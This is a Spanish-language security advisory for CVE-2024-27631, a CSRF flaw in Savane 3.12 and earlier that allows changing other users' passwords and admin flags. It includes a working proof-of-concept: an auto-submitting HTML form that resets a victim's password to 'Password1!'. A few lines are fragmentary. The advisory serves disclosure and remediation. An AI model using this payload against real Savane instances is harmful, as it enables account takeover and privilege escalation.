
Referencia CVE-2024–27631
En Savane v3.12 y versiones anteriores, la falta de protección CSRF en las funciones administrativas puede permitir la escalada de privilegios y/o la toma de control de cuentas. En particular, el endpoint /siteadmin/usergroup.php incluye la funcionalidad para cambiar las contraseñas y los indicadores administrativos de otros usuarios, lo que efectivamente permite a un atacante convertirse en administrador.
Otros endpoints notables vulnerables a CSRF incluyen:
Clasificación CWE: CWE-352: Cross-Site Request Forgery (CSRF)
Reportado por: Ally Petitt
Producto afectado: Savane
Versiones afectadas: 3.12 y anteriores
Esta es una prueba de concepto (PoC) para cambiar la contraseña de la cuenta de otro usuario como vía para la toma de control de la cuenta.
/users/<username>).<savane_instance> con el nombre de dominio/dirección de host adecuados.<form id="autosubmit" action="http://<savane_instance>/siteadmin/user_changepw.php" method="POST">
<input name="form_pw" type="hidden" value="Password1!" />
<input name="form_pw2" type="hidden" value="Password1!" />
<input name="user_id" type="hidden" value="<user_id>" />
<input name="update" type="hidden" value="Update" />
<input type="submit" value="Submit Request" />
</form>
<script>
document.getElementById("autosubmit").submit();
</script>
Password1!.Tenga en cuenta que este script PoC fue probado en Firefox v103.0 (64 bits).
Actualice a la versión 3.13 de Savane o superior. El parche se puede encontrar aquí.